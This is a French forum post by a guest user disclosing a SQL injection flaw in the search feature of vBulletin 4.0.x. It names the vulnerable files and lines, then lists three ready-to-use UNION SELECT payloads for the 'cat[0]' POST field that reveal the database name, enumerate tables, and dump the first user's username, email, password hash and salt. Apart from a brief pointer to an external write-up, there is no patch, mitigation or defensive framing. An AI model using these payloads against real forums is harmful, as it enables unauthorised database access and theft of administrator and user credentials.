Aller au contenu
Règlement du forum ×
IPTV et arnaques ×

faille 4.0.x vBulletin (Recherche) SQLI


Invité lakamora

Messages recommandés

Invité lakamora

--------------------------

# ~Vulnerable Codes~ #

--------------------------

/vb/search/searchtools.php - line 715;

/packages/vbforum/search/type/socialgroup.php - line 201:203;

 

--------------------------

# ~Exploit~ #

--------------------------

POST data on "Search Multiple Content Types" => "groups"

 

&cat[0]=1) UNION SELECT database()#

&cat[0]=1) UNION SELECT table_name FROM information_schema.tables#

&cat[0]=1) UNION SELECT concat(username,0x3a,email,0x3a,password,0x3a,salt) FROM user WHERE userid=1#

 

plus d'info sur : http://j0hnx3r.org/?p=818

 

 

 

 

 

il devient bien pourri le vbulletin :confused::confused:

Lien vers le commentaire
Partager sur d’autres sites

Veuillez vous connecter pour commenter

Vous pourrez laisser un commentaire après vous êtes connecté.



Connectez-vous maintenant
×
×
  • Créer...